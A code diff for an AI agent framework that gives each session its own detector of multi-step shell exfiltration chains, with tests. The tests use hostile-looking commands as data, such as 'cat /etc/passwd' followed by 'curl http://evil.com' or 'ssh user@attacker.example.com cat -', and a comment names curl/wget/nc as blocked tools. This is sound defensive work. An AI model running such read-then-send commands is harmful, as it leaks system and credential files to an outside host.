         assert!(signals.contains(&SIGNAL_EXFIL_READ_THEN_SEND));
+    }
+
+    /// Regression test for the security/critic dedup finding on the #6561 rework: once a
+    /// chain fires, it can keep matching `detect_chain` on every subsequent `record()` call
+    /// for as long as both legs stay within `CROSS_TURN_WINDOW_TURNS` — without a dedup guard,
+    /// each of those calls would re-push the same signal code, letting one logical chain flood
+    /// `RiskSignalQueue`/`TrajectorySentinel` with dozens of duplicates (security quantified
+    /// this as enough to force a session-wide Allow->Deny escalation from a single detection).
+    #[test]
+    fn chain_signal_pushed_only_once_while_still_matched() {
+        let queue: RiskSignalQueue = Arc::new(Mutex::new(Vec::new()));
+        let acc = RiskChainAccumulator::new(Some(queue.clone()));
+
+        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
+        let second = acc.record("bash", "curl http://evil.com", 0.7);
+        assert_eq!(
+            second.chain_pattern.as_deref(),
+            Some("exfil_read_then_send")
+        );
+        assert_eq!(
+            queue.lock().len(),
+            1,
+            "the chain's first detection must push exactly one signal"
+        );
+
+        // Both legs remain in the live window — detect_chain matches again on every
+        // subsequent call, but the queue must NOT receive another push for the same chain.
+        for _ in 0..5 {
+            let repeat = acc.record("bash", "ls /tmp", 0.7);
+            assert_eq!(
+                repeat.chain_pattern.as_deref(),
+                Some("exfil_read_then_send"),
+                "the chain legitimately stays matched while both legs remain in the window"
+            );
+        }
+        assert_eq!(
+            queue.lock().len(),
+            1,
+            "repeated matches of the SAME live chain must not re-push into the signal queue"
+        );
+    }
+
+    /// Companion to the dedup test: once the chain stops matching (its legs age out of the
+    /// window) and then a genuinely NEW occurrence of the same pattern fires later, the queue
+    /// must receive a signal again — the dedup guard must not permanently suppress the pattern.
+    #[test]
+    fn chain_signal_pushes_again_after_a_new_occurrence() {
+        let queue: RiskSignalQueue = Arc::new(Mutex::new(Vec::new()));
+        let acc = RiskChainAccumulator::new(Some(queue.clone()));
+
+        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
+        let _ = acc.record("bash", "curl http://evil.com", 0.7);
+        assert_eq!(queue.lock().len(), 1);
+
+        // Advance past the window so the old chain fully ages out.
+        for _ in 0..=CROSS_TURN_WINDOW_TURNS {
+            acc.advance_turn();
+        }
+
+        // A brand new, unrelated occurrence of the same pattern.
+        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
+        let second = acc.record("bash", "curl http://evil.com", 0.7);
+        assert_eq!(
+            second.chain_pattern.as_deref(),
+            Some("exfil_read_then_send")
+        );
+        assert_eq!(
+            queue.lock().len(),
+            2,
+            "a genuinely new occurrence of the same pattern must push again after the old \
+             one aged out"
+        );
     }
 
     // --- #4270: ssh/scp/rsync → NetworkEgress ---

--- a/crates/zeph-tools/src/shell/mod.rs
+++ b/crates/zeph-tools/src/shell/mod.rs
@@ -404,6 +404,22 @@ impl ShellPolicyHandle {
     pub fn snapshot_blocked(&self) -> Vec<String> {
         self.inner.load().blocked_commands.clone()
     }
+
+    /// Build a handle from scratch, without an accompanying [`ShellExecutor`] (#6588).
+    ///
+    /// Entry points that construct a fresh `ShellExecutor` per session (ACP, serve — so each
+    /// session gets its own [`RiskChainAccumulator`] instead of sharing one across concurrent
+    /// sessions) need ONE handle shared across every session's executor, so a hot-reload
+    /// (`rebuild`) reaches all of them. Build this once per connection/server and pass it to
+    /// [`ShellExecutor::with_shared_policy`] for each session's executor.
+    #[must_use]
+    pub fn new_shared(config: &crate::config::ShellConfig) -> Self {
+        Self {
+            inner: Arc::new(ArcSwap::from_pointee(ShellPolicy {
+                blocked_commands: compute_blocked_commands(config),
+            })),
+        }
+    }
 }
 
 /// Compute the effective blocklist from an already-overlay-merged `ShellConfig`.
@@ -638,6 +654,20 @@ impl ShellExecutor {
     #[must_use]
     pub fn with_risk_chain(mut self, accumulator: Arc<RiskChainAccumulator>) -> Self {
         self.risk_chain = Some(accumulator);
+        self
+    }
+
+    /// Replace this executor's policy `ArcSwap` with an externally shared one (#6588).
+    ///
+    /// Used when multiple `ShellExecutor` instances (one per session, e.g. ACP/serve so each
+    /// session gets its own [`RiskChainAccumulator`]) must all observe the same live
+    /// `blocked_commands` rebuilds from a single [`ShellPolicyHandle`] — without this, each
+    /// fresh per-session executor would carry its own independent snapshot frozen at
+    /// construction time, and [`ShellPolicyHandle::rebuild`] would only ever reach whichever
+    /// instance it happened to be obtained from via [`Self::policy_handle`].
+    #[must_use]
+    pub fn with_shared_policy(mut self, handle: &ShellPolicyHandle) -> Self {
+        self.policy = Arc::clone(&handle.inner);
         self
     }
 

--- a/src/acp.rs
+++ b/src/acp.rs
@@ -364,11 +364,14 @@ pub(crate) struct SharedAgentDeps {
     rl_persist_interval: u32,
     rl_warmup_updates: u32,
     rl_head: Option<zeph_skills::rl_head::RoutingHead>,
-    /// Base tool composite (file/shell/scrape/diagnostics + MCP + `search_code`), *not*
-    /// wrapped in any gate. `spawn_acp_agent` composites this further with `skill_loader`/
-    /// `memory`/`overflow`/ACP-native fs/shell per session, then wraps the FULL per-session
-    /// result in `PolicyGateExecutor -> AdversarialPolicyGateExecutor -> TrustGateExecutor`
-    /// (outermost first) via `policy_gate_pieces` below and
+    /// Base tool composite (file/scrape/diagnostics/time + MCP + `search_code`), *not*
+    /// wrapped in any gate. Deliberately excludes `shell` (#6588) — `spawn_acp_agent` composes
+    /// a fresh per-session `ShellExecutor` (built from `shell_config`/`shell_sandbox`/etc.
+    /// below) as an outer layer around this shared chain, so each session gets its own
+    /// `RiskChainAccumulator`. `spawn_acp_agent` further composites the result with
+    /// `skill_loader`/`memory`/`overflow`/ACP-native fs/shell per session, then wraps the FULL
+    /// per-session result in `PolicyGateExecutor -> AdversarialPolicyGateExecutor ->
+    /// TrustGateExecutor` (outermost first) via `policy_gate_pieces` below and
     /// `agent_setup::apply_common_tool_gating`/`apply_policy_gate_chain` — so this field must
     /// never be dispatched to directly without that wrap.
     tool_executor: std::sync::Arc<dyn zeph_tools::ErasedToolExecutor>,
@@ -379,6 +382,25 @@ pub(crate) struct SharedAgentDeps {
     /// Shared permission policy, threaded into `spawn_acp_agent`'s `TrustGateExecutor` wrap
     /// (via `apply_common_tool_gating`).
     permission_policy: zeph_tools::PermissionPolicy,
+    /// `config.tools.shell` snapshot (#6588), used by `spawn_acp_agent` to rebuild a fresh
+    /// `ShellExecutor` per session — see `tool_executor`'s doc comment for why shell cannot be
+    /// shared connection-wide the way the rest of the base chain is.
+    shell_config: zeph_config::tools::ShellConfig,
+    /// `config.tools.filters` snapshot (#6588), rebuilt into a fresh `OutputFilterRegistry` per
+    /// session alongside the fresh `ShellExecutor` above.
+    shell_filters_config: zeph_config::tools::FilterConfig,
+    /// Pre-initialized OS sandbox backend + policy (#6588): initialization is real work and
+    /// connection-scoped, so it is built once here and cheaply `Arc`-cloned into each session's
+    /// fresh `ShellExecutor` rather than re-initialized per session. `None` when
+    /// `[tools.sandbox] enabled = false` or initialization failed non-strictly.
+    shell_sandbox: Option<(
+        std::sync::Arc<dyn zeph_tools::Sandbox>,
+        zeph_tools::SandboxPolicy,
+    )>,
+    /// Supervisor for the per-session `ShellExecutor`'s background shell runs (#6588). Same
+    /// `acp_mem_supervisor` instance every other connection-scoped background task in
+    /// `build_acp_deps` uses.
+    shell_task_supervisor: std::sync::Arc<zeph_common::TaskSupervisor>,
     /// Pre-built declarative-policy enforcer and adversarial-policy validator/LLM-client
     /// (`[tools.policy]`+`[tools.authorization]` and `[tools.adversarial_policy]`), built once
     /// per connection via `agent_setup::build_policy_gate_pieces` since both depend only on
@@ -581,13 +603,6 @@ pub(crate) struct SharedAgentDeps {
     startup_shell_overlay: zeph_core::ShellOverlaySnapshot,
     /// Live-rebuild handle for the `ShellExecutor`'s `blocked_commands` policy.
     shell_policy_handle: zeph_tools::ShellPolicyHandle,
-    /// Shared multi-step shell attack-chain detector, attached to the shared `ShellExecutor`
-    /// above via `agent_setup::wire_risk_chain`. `spawn_acp_agent` passes the same `Arc` into
-    /// every session's `Agent::with_risk_chain_accumulator` via
-    /// `agent_setup::apply_entrypoint_security_controls` (#6578) — mirrors `src/runner.rs` and
-    /// `src/daemon.rs`. See `agent_setup::wire_risk_chain`'s doc comment for the cross-session
-    /// sharing caveat under concurrent ACP sessions on this connection.
-    risk_chain_accumulator: std::sync::Arc<zeph_tools::RiskChainAccumulator>,
     /// Typed-page CAM fidelity state (#6574), built once per connection via
     /// `agent_setup::build_typed_pages_state` since `[memory.compression.typed_pages]` is static
     /// config. `spawn_acp_agent` clones the `Arc` into every session via
@@ -751,17 +766,26 @@ async fn build_acp_deps(
         "acp",
     );
 
-    let filter_registry = if config.tools.filters.enabled {
-        zeph_tools::OutputFilterRegistry::default_filters(&config.tools.filters)
-    } else {
-        zeph_tools::OutputFilterRegistry::new(false)
-    };
     let permission_policy =
         zeph_tools::build_permission_policy(&config.tools, config.security.autonomy_level);
-    let mut shell_executor = zeph_tools::ShellExecutor::new(&config.tools.shell)
-        .with_permissions(permission_policy.clone())
-        .with_output_filters(filter_registry)
-        .with_task_supervisor((*acp_mem_supervisor).clone());
+    // #6588: `ShellExecutor` is NOT built here — unlike file/scrape/diagnostics/time/mcp (safe
+    // to share connection-wide), it must be rebuilt fresh per session in `spawn_acp_agent` so
+    // each concurrent ACP session gets its own `RiskChainAccumulator` instead of sharing one
+    // (a shared instance would let one session's turn-reset wipe another's mid-chain state, or
+    // cross-combine unrelated sessions' shell activity into a spurious chain fire). Only the
+    // expensive, connection-scoped ingredients are built once here and stored on
+    // `SharedAgentDeps` for `spawn_acp_agent` to cheaply assemble into a fresh executor per
+    // session: the OS sandbox backend (initialization is real work), the shared
+    // `ShellPolicyHandle` (so hot-reload still reaches every session's executor via
+    // `ShellExecutor::with_shared_policy`), and config snapshots for
+    // permissions/filters/task-supervisor.
+    let shell_config = config.tools.shell.clone();
+    let shell_filters_config = config.tools.filters.clone();
+    let shell_policy_handle = zeph_tools::ShellPolicyHandle::new_shared(&config.tools.shell);
+    let mut shell_sandbox: Option<(
+        std::sync::Arc<dyn zeph_tools::Sandbox>,
+        zeph_tools::SandboxPolicy,
+    )> = None;
     if config.tools.sandbox.enabled {
         let denied_present = !config.tools.sandbox.denied_domains.is_empty();
         match zeph_tools::sandbox::build_sandbox_with_policy(
@@ -772,7 +796,7 @@ async fn build_acp_deps(
             Ok(backend) => {
                 let name = backend.name();
                 let policy = crate::agent_setup::sandbox_policy_from_config(&config.tools.sandbox);
-                shell_executor = shell_executor.with_sandbox(std::sync::Arc::from(backend), policy);
+                shell_sandbox = Some((std::sync::Arc::from(backend), policy));
                 tracing::info!(backend = name, "OS sandbox enabled (acp)");
             }
             Err(e) if config.tools.sandbox.strict || config.tools.sandbox.fail_if_unavailable => {
@@ -827,18 +851,12 @@ async fn build_acp_deps(
         && let Ok(logger) = zeph_tools::AuditLogger::from_config(&config.tools.audit, false).await
     {
         let logger = std::sync::Arc::new(logger);
-        shell_executor = shell_executor.with_audit(std::sync::Arc::clone(&logger));
         scrape_executor = scrape_executor.with_audit(std::sync::Arc::clone(&logger));
         if let Some(w) = web_search_executor.take() {
             web_search_executor = Some(w.with_audit(std::sync::Arc::clone(&logger)));
         }
         acp_audit_logger = Some(logger);
     }
-    // #6578: wire the multi-step shell attack-chain detector, matching src/runner.rs's
-    // `agent_setup::build_tool_setup` — previously only the CLI/TUI path constructed a
-    // `RiskChainAccumulator`, so ACP sessions' `ShellExecutor` silently skipped the
-    // `SensitiveRead` -> `NetworkEgress` chain check entirely.
-    let (shell_executor, risk_chain_accumulator) = agent_setup::wire_risk_chain(shell_executor);
     let file_executor = zeph_tools::FileExecutor::new(
         config
             .tools
@@ -879,7 +897,6 @@ async fn build_acp_deps(
     if let Some(ref logger) = acp_audit_logger {
         mcp_executor = mcp_executor.with_audit(std::sync::Arc::clone(logger));
     }
-    let shell_policy_handle = shell_executor.policy_handle();
     let diagnostics_executor = crate::agent_setup::build_diagnostics_executor(config);
     let clock: std::sync::Arc<dyn zeph_common::ClockSource> =
         std::sync::Arc::new(zeph_common::SystemClock);
@@ -889,9 +906,11 @@ async fn build_acp_deps(
     // which wraps the FULLY composed tree in one outermost `TrustGateExecutor` (see
     // `apply_common_tool_gating`). Gating only this sub-tree (as before #5611) let tools
     // composed outside it (memory, MCP, skill loader) bypass Quarantine/Blocked entirely.
-    let base_executor = crate::agent_setup::build_base_executor_chain(
+    // #6588: `shell` is deliberately excluded here (see the `shell_config`/`shell_sandbox`
+    // comment above) — `spawn_acp_agent` composes a fresh per-session `ShellExecutor` as an
+    // outer layer around this shared chain instead.
+    let base_executor = crate::agent_setup::build_shared_base_chain_without_shell(
         file_executor,
-        shell_executor,
         scrape_executor,
         diagnostics_executor,
         time_executor,
@@ -1188,6 +1207,10 @@ async fn build_acp_deps(
         tool_executor,
         clock,
         permission_policy,
+        shell_config,
+        shell_filters_config,
+        shell_sandbox,
+        shell_task_supervisor: std::sync::Arc::clone(&acp_mem_supervisor),
         policy_gate_pieces,
         capability_scopes_config,
         shadow_sentinel_config,
@@ -1349,7 +1372,6 @@ async fn build_acp_deps(
             zeph_core::ShellOverlaySnapshot { blocked, allowed }
         },
         shell_policy_handle,
-        risk_chain_accumulator,
         typed_pages_state,
         shadow_memory_config: config.memory.shadow_memory.clone(),
     };
@@ -1760,6 +1782,45 @@ async fn spawn_acp_agent(
     };
     let (skill_loader_executor, skill_invoke_executor, trust_snapshot) =
         agent_setup::build_skill_executors(&registry);
+
+    // #5958: shared trajectory risk slot/signal queue, created here (rather than further below,
+    // where they previously lived) so the same queue can be wired into this session's fresh
+    // `RiskChainAccumulator` (#6588) before the tool executor chain is composed. Written by
+    // begin_turn(), read by PolicyGateExecutor; drained by begin_turn() too.
+    let trajectory_risk_slot: zeph_tools::TrajectoryRiskSlot =
+        Arc::new(parking_lot::RwLock::new(0u8));
+    let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
+        Arc::new(parking_lot::Mutex::new(Vec::new()));
+
+    // #6588: build a fresh `ShellExecutor` for THIS session instead of sharing `d.tool_executor`'s
+    // (deliberately shell-less) chain's neighbor — see `SharedAgentDeps::tool_executor`'s doc
+    // comment. Reuses the connection-scoped, expensive-to-build ingredients (sandbox, shared
+    // policy handle, permission policy, audit logger, task supervisor) so nothing here re-does
+    // real work; only the `ShellExecutor` struct itself and its `RiskChainAccumulator` (via
+    // `wire_risk_chain`, #6561/#6588) are new.
+    let mut session_shell_executor = zeph_tools::ShellExecutor::new(&d.shell_config)
+        .with_permissions(permission_policy.clone())
+        .with_output_filters(if d.shell_filters_config.enabled {
+            zeph_tools::OutputFilterRegistry::default_filters(&d.shell_filters_config)
+        } else {
+            zeph_tools::OutputFilterRegistry::new(false)
+        })
+        .with_task_supervisor((*d.shell_task_supervisor).clone())
+        .with_shared_policy(&d.shell_policy_handle);
+    if let Some((ref sandbox, ref policy)) = d.shell_sandbox {
+        session_shell_executor =
+            session_shell_executor.with_sandbox(Arc::clone(sandbox), policy.clone());
+    }
+    if let Some(ref logger) = d.audit_logger {
+        session_shell_executor = session_shell_executor.with_audit(Arc::clone(logger));
+    }
+    let (session_shell_executor, risk_chain_accumulator) =
+        agent_setup::wire_risk_chain(session_shell_executor, Arc::clone(&trajectory_signal_queue));
+    let tool_executor: Arc<dyn ErasedToolExecutor> = Arc::new(zeph_tools::CompositeExecutor::new(
+        session_shell_executor,
+        zeph_tools::DynExecutor(tool_executor),
+    ));
+
     let (base_composite, cancel_signal, provider_override, parent_tool_use_id): (
         Arc<dyn ErasedToolExecutor>,
         _,
@@ -1843,15 +1904,11 @@ async fn spawn_acp_agent(
     );
     crate::agent_setup::register_mcp_tool_ids(&mcp_ids_handle, &mcp_tools);
 
-    // #5958: shared trajectory risk slot — written by begin_turn(), read by PolicyGateExecutor —
-    // and pending risk signal queue — executor layers push signal codes; begin_turn() drains.
-    // Built fresh per session (like ShadowSentinel below), mirroring src/runner.rs; previously
-    // ACP never created these, so TrajectorySentinel was never wired into any ACP session.
-    let trajectory_risk_slot: zeph_tools::TrajectoryRiskSlot =
-        Arc::new(parking_lot::RwLock::new(0u8));
-    let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
-        Arc::new(parking_lot::Mutex::new(Vec::new()));
-
+    // #5958: shared trajectory risk slot/signal queue — written by begin_turn(), read by
+    // PolicyGateExecutor; pending risk signal queue drained by begin_turn(). Created earlier
+    // (before the per-session `ShellExecutor`/tool executor chain, for #6588) and reused here;
+    // mirrors src/runner.rs/src/daemon.rs.
+    //
     // Wire AdversarialPolicyGateExecutor / PolicyGateExecutor around the trust-gated
     // per-session composite, using the pieces pre-built once per connection in
     // `build_acp_deps` — previously these gates wrapped only the connection-scoped
@@ -2281,13 +2338,14 @@ async fn spawn_acp_agent(
     );
     agent = agent_setup::apply_secret_masking(agent, secret_registry);
     agent = agent_setup::apply_vigil(agent, &vigil_config);
-    // Risk-chain accumulator (#6578), MAGE trajectory-risk gate (#6579), typed-page CAM fidelity
-    // (#6574) — shared with src/runner.rs/src/daemon.rs/src/serve/agent_factory.rs via one call
-    // site so the three controls cannot silently drop out of sync across entry points again
-    // (#6581).
+    // Risk-chain accumulator (#6561/#6588: this session's own instance, built alongside its
+    // `ShellExecutor` above — see the comment there), MAGE trajectory-risk gate (#6579),
+    // typed-page CAM fidelity (#6574) — shared with src/runner.rs/src/daemon.rs/
+    // src/serve/agent_factory.rs via one call site so the three controls cannot silently drop
+    // out of sync across entry points again (#6581).
     agent = agent_setup::apply_entrypoint_security_controls(
         agent,
-        d.risk_chain_accumulator.clone(),
+        risk_chain_accumulator,
         mage_accumulator_config.clone(),
         d.typed_pages_state.clone(),
     );
@@ -4127,6 +4185,136 @@ mod tests {
             "expected the OutOfScope signal code (3) to be pushed into the shared trajectory \
              signal queue after a scope-denied tool call, proving spawn_acp_agent's new \
              `.with_signal_queue(...)` call on the ScopedToolExecutor branch is reachable"
+        );
+    }
+
+    fn acp_bash_call(command: &str) -> zeph_tools::ToolCall {
+        let mut params = serde_json::Map::new();
+        params.insert(
+            "command".into(),
+            serde_json::Value::String(command.to_owned()),
+        );
+        zeph_tools::ToolCall {
+            tool_id: "bash".into(),
+            params,
+            caller_id: None,
+            context: None,
+            tool_call_id: String::new(),
+            skill_name: None,
+        }
+    }
+
+    /// Builds one session's per-session `ShellExecutor` + shared "rest" composite exactly as
+    /// `spawn_acp_agent` now does (#6588): a fresh `ShellExecutor` wired with its own
+    /// `RiskChainAccumulator`, wrapped as an outer `CompositeExecutor` layer around
+    /// `agent_setup::build_shared_base_chain_without_shell`'s shared chain. Returns the gated
+    /// executor and the signal queue so callers can assert on both dispatch outcomes and the
+    /// #6561 cross-turn fallback.
+    fn build_acp_session_shell_composite(
+        allowed_paths: Vec<PathBuf>,
+    ) -> (zeph_tools::DynExecutor, zeph_tools::RiskSignalQueue) {
+        let mut config = zeph_core::config::Config::default();
+        config.tools.shell.allowed_paths = allowed_paths
+            .iter()
+            .map(|p| p.display().to_string())
+            .collect();
+        let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
+            Arc::new(parking_lot::Mutex::new(Vec::new()));
+        let risk_chain_accumulator = Arc::new(zeph_tools::RiskChainAccumulator::new(Some(
+            Arc::clone(&trajectory_signal_queue),
+        )));
+        let session_shell_executor = zeph_tools::ShellExecutor::new(&config.tools.shell)
+            .with_risk_chain(Arc::clone(&risk_chain_accumulator));
+        let file_executor = zeph_tools::FileExecutor::new(vec![]);
+        let scrape_executor = zeph_tools::WebScrapeExecutor::new(&config.tools.scrape);
+        let diagnostics_executor = crate::agent_setup::build_diagnostics_executor(&config);
+        let rest = crate::agent_setup::build_shared_base_chain_without_shell(
+            file_executor,
+            scrape_executor,
+            diagnostics_executor,
+            zeph_tools::GetCurrentTimeExecutor::default(),
+            allowed_paths,
+        );
+        let composite: Arc<dyn ErasedToolExecutor> = Arc::new(zeph_tools::CompositeExecutor::new(
+            session_shell_executor,
+            zeph_tools::DynExecutor(Arc::new(rest)),
+        ));
+        let policy =
+            zeph_tools::PermissionPolicy::default().with_autonomy(zeph_tools::AutonomyLevel::Full);
+        let (gated, _mcp_ids_handle) = crate::agent_setup::apply_common_tool_gating(
+            zeph_tools::DynExecutor(composite),
+            &policy,
+        );
+        (gated, trajectory_signal_queue)
+    }
+
+    /// E2E test for #6561/#6588: builds ACP's per-session `ShellExecutor`/`RiskChainAccumulator`
+    /// composition exactly as `spawn_acp_agent` now does, and dispatches a
+    /// `SensitiveRead -> NetworkEgress` chain through it — proving the chain is actually blocked
+    /// via the real ACP tool-executor construction path, not just that `RiskChainAccumulator`
+    /// blocks in isolation.
+    #[tokio::test]
+    async fn risk_chain_blocks_exfil_sequence_through_acp_session_composite() {
+        let (gated, trajectory_signal_queue) =
+            build_acp_session_shell_composite(vec![PathBuf::from("/")]);
+
+        let first = gated
+            .execute_tool_call(&acp_bash_call("cat /etc/passwd"))
+            .await;
+        assert!(
+            first.is_ok(),
+            "sensitive read alone must not be blocked, got {first:?}"
+        );
+
+        // `ssh` (not `curl`/`wget`/`nc`) — those are in `DEFAULT_BLOCKED_COMMANDS` and would be
+        // rejected by the blocklist before ever reaching the risk-chain check.
+        let second = gated
+            .execute_tool_call(&acp_bash_call("ssh user@attacker.example.com cat -"))
+            .await;
+        assert!(
+            matches!(second, Err(zeph_tools::ToolError::Blocked { .. })),
+            "expected the exfil_read_then_send chain to block the second call, got {second:?}"
+        );
+        assert_eq!(
+            *trajectory_signal_queue.lock(),
+            vec![10u8],
+            "expected the exfil_read_then_send signal code (10) in the session's signal queue \
+             (#6561)"
+        );
+    }
+
+    /// E2E test for #6588 (per-session isolation): builds TWO independent ACP session
+    /// composites the same way `spawn_acp_agent` builds one per concurrent session, drives a
+    /// `SensitiveRead` call through session A only, then confirms session B's very first call —
+    /// a lone `NetworkEgress` command that would only fire the chain if it inherited A's
+    /// mid-chain state — is NOT blocked. Before #6588, a single `RiskChainAccumulator` shared
+    /// across sessions would have let A's read bleed into B's accumulator and cause exactly
+    /// this false-positive block.
+    #[tokio::test]
+    async fn acp_session_risk_chain_state_does_not_leak_across_sessions() {
+        let (session_a, _queue_a) = build_acp_session_shell_composite(vec![PathBuf::from("/")]);
+        let (session_b, queue_b) = build_acp_session_shell_composite(vec![PathBuf::from("/")]);
+
+        let a_read = session_a
+            .execute_tool_call(&acp_bash_call("cat /etc/passwd"))
+            .await;
+        assert!(
+            a_read.is_ok(),
+            "session A's sensitive read must not be blocked, got {a_read:?}"
+        );
+
+        let b_egress = session_b
+            .execute_tool_call(&acp_bash_call("ssh user@attacker.example.com cat -"))
+            .await;
+        assert!(
+            b_egress.is_ok(),
+            "session B's lone network-egress call must NOT be blocked by session A's prior \
+             sensitive read — a block here would mean the two sessions share \
+             RiskChainAccumulator state, got {b_egress:?}"
+        );
+        assert!(
+            queue_b.lock().is_empty(),
+            "session B's signal queue must stay empty — no chain should have fired for it"
         );
     }
 

--- a/src/agent_setup.rs
+++ b/src/agent_setup.rs
@@ -79,7 +79,9 @@ pub(crate) struct ToolSetup {
     /// Per-session risk chain accumulator wired to `ShellExecutor`.
     ///
     /// Pass the same `Arc` to `AgentBuilder::with_risk_chain_accumulator` so
-    /// `begin_turn()` resets the per-turn score at each turn boundary.
+    /// `begin_turn()` advances it (pruning stale calls and recomputing the score, rather than
+    /// fully resetting — see `zeph_tools::risk_chain::RiskChainAccumulator::advance_turn`) at
+    /// each turn boundary.
     pub(crate) risk_chain_accumulator: Arc<zeph_tools::RiskChainAccumulator>,
     /// `true` when the built `mcp_executor` had a `MediaSanitizer` attached (spec-072 P3,
     /// #6241). `false` when `--no-mcp-media` disabled it for the session. Read only by
@@ -450,6 +452,7 @@ pub(crate) async fn build_tool_setup(
     pool: Option<&zeph_db::DbPool>,
     provider: &zeph_llm::any::AnyProvider,
     supervisor: Option<&zeph_common::TaskSupervisor>,
+    trajectory_signal_queue: zeph_tools::RiskSignalQueue,
 ) -> ToolSetup {
     let filter_registry = if config.tools.filters.enabled {
         zeph_tools::OutputFilterRegistry::default_filters(&config.tools.filters)
@@ -642,7 +645,8 @@ pub(crate) async fn build_tool_setup(
     if let Some(ref logger) = audit_logger {
         mcp_executor = mcp_executor.with_audit(Arc::clone(logger));
     }
-    let (shell_executor, risk_chain_accumulator) = wire_risk_chain(shell_executor);
+    let (shell_executor, risk_chain_accumulator) =
+        wire_risk_chain(shell_executor, trajectory_signal_queue);
     let shell_policy_handle = shell_executor.policy_handle();
     let shell_executor = Arc::new(shell_executor);
     let shell_executor_handle = Some(Arc::clone(&shell_executor));
@@ -697,34 +701,39 @@ pub(crate) async fn build_tool_setup(
 /// detector (`SensitiveRead` -> `NetworkEgress`, e.g. `exfil_read_then_send`) is actually
 /// enforced — without it, `ShellExecutor::execute`'s risk-chain check is silently skipped
 /// (#6578). Pass the returned `Arc` to `Agent::with_risk_chain_accumulator` (via
-/// [`apply_entrypoint_security_controls`]) so `begin_turn()` resets the per-turn score at each
-/// turn boundary.
+/// [`apply_entrypoint_security_controls`]) so `begin_turn()` advances it (prunes calls older
+/// than its cross-turn window and recomputes the score — see
+/// [`zeph_tools::risk_chain::RiskChainAccumulator::advance_turn`]) at each turn boundary.
 ///
-/// # Known limitation: cross-session sharing in ACP/serve
+/// # Cross-session isolation in ACP/serve (#6588)
 ///
-/// [`zeph_tools::RiskChainAccumulator`]'s own contract is "one instance per agent turn, reset at
-/// each turn boundary." `runner.rs` and `daemon.rs` satisfy this exactly (one agent per process).
-/// `acp.rs` and `serve/deps.rs`, however, call this function once per **connection**/**server**
-/// (because the underlying `ShellExecutor` itself is already shared at that scope, predating this
-/// fix) and then hand the *same* `Arc` to every concurrent session built on top of it. Since
-/// `Agent::begin_turn()` unconditionally calls `reset()` on whatever accumulator it holds, one
-/// session's turn boundary can wipe another concurrent session's mid-chain `SensitiveRead` state
-/// (false negative — silently defeats the very detector this function exists to wire in), and
-/// interleaved calls from different sessions can cross-combine into a spurious chain fire on an
-/// unrelated session (false positive). This is not a regression introduced here — these entry
-/// points had zero risk-chain detection before this fix — but it means the detector is not fully
-/// session-isolated under concurrent ACP/serve load. A real fix needs either a per-session
-/// `ShellExecutor` or routing `record()` calls through session-scoped state at call time; both are
-/// out of scope for this wiring-consistency fix (#6578/#6581).
+/// [`zeph_tools::RiskChainAccumulator`]'s own contract is "one instance per agent session."
+/// `runner.rs` and `daemon.rs` satisfy this exactly by calling this function once per process
+/// (one agent per process). `acp.rs`'s `spawn_acp_agent` and `serve/agent_factory.rs`'s
+/// `build_agent_factory` call this function once per **session**, each with a fresh
+/// `ShellExecutor` and that session's own `trajectory_signal_queue` — so every concurrent
+/// session gets its own accumulator instead of sharing one built at connection/server scope.
+/// Without this, `Agent::begin_turn()`'s `advance_turn()` call on whatever accumulator it holds
+/// would prune/recompute one session's state on another concurrent session's turn boundary
+/// (false negative or false positive), or interleaved calls from different sessions
+/// cross-combine into a spurious chain fire on an unrelated session.
+///
+/// `queue` — the session's `trajectory_signal_queue`, so a chain detection reaches
+/// `TrajectorySentinel`/MAGE too (#6561). The queue push is not what makes cross-turn detection
+/// possible — `advance_turn()`'s prune-and-recompute (instead of a full reset) is — the queue is
+/// a secondary reporting channel; see the `risk_chain` module docs for the full mechanism.
 pub(crate) fn wire_risk_chain(
     shell_executor: zeph_tools::ShellExecutor,
+    queue: zeph_tools::RiskSignalQueue,
 ) -> (
     zeph_tools::ShellExecutor,
     Arc<zeph_tools::RiskChainAccumulator>,
 ) {
-    let risk_chain_accumulator = Arc::new(zeph_tools::RiskChainAccumulator::new(None));
+    let risk_chain_accumulator = Arc::new(zeph_tools::RiskChainAccumulator::new(Some(queue)));
     let shell_executor = shell_executor.with_risk_chain(Arc::clone(&risk_chain_accumulator));
-    tracing::info!("security.risk_chain: RiskChainAccumulator wired to ShellExecutor");
+    tracing::info!(
+        "security.risk_chain: RiskChainAccumulator wired to ShellExecutor with cross-turn signal queue"
+    );
     (shell_executor, risk_chain_accumulator)
 }
 
@@ -1974,6 +1983,62 @@ where
     )
 }
 
+/// Assembles the `file -> scrape -> cwd -> diagnostics -> get_current_time` composite chain —
+/// identical to [`build_base_executor_chain`] but *without* the `shell` slot.
+///
+/// Used by entry points where `ShellExecutor` must be rebuilt fresh per session instead of
+/// shared connection/server-wide, so each session gets its own [`zeph_tools::RiskChainAccumulator`]
+/// (#6588: ACP's `spawn_acp_agent`, serve's per-session agent factory — both genuinely
+/// multi-session-per-process). The caller composes the returned chain with a fresh
+/// per-session `ShellExecutor` as an *outer* layer:
+/// `CompositeExecutor::new(fresh_shell_executor, DynExecutor(Arc::new(this)))`. Note the
+/// resulting nesting order (shell outermost) differs from [`build_base_executor_chain`]'s
+/// (file outermost) — harmless, since `CompositeExecutor` dispatches by unique tool name, not
+/// slot order.
+///
+/// CLI (`runner.rs`) and the daemon (`daemon.rs`) are single-session-per-process, so a shared
+/// `ShellExecutor` built once is already correct there — they use
+/// [`build_base_executor_chain`] directly instead of this function.
+#[expect(
+    clippy::type_complexity,
+    reason = "concrete nested CompositeExecutor chain type mirrors build_base_executor_chain's \
+              rationale — pinning the exact static chain shape is the point of this helper"
+)]
+pub(crate) fn build_shared_base_chain_without_shell<F, W>(
+    file_executor: F,
+    scrape_executor: W,
+    diagnostics_executor: zeph_tools::DiagnosticsExecutor,
+    time_executor: zeph_tools::GetCurrentTimeExecutor,
+    cwd_allowed_paths: Vec<PathBuf>,
+) -> zeph_tools::CompositeExecutor<
+    F,
+    zeph_tools::CompositeExecutor<
+        W,
+        zeph_tools::CompositeExecutor<
+            zeph_tools::SetCwdExecutor,
+            zeph_tools::CompositeExecutor<
+                zeph_tools::DiagnosticsExecutor,
+                zeph_tools::GetCurrentTimeExecutor,
+            >,
+        >,
+    >,
+>
+where
+    F: zeph_tools::ToolExecutor,
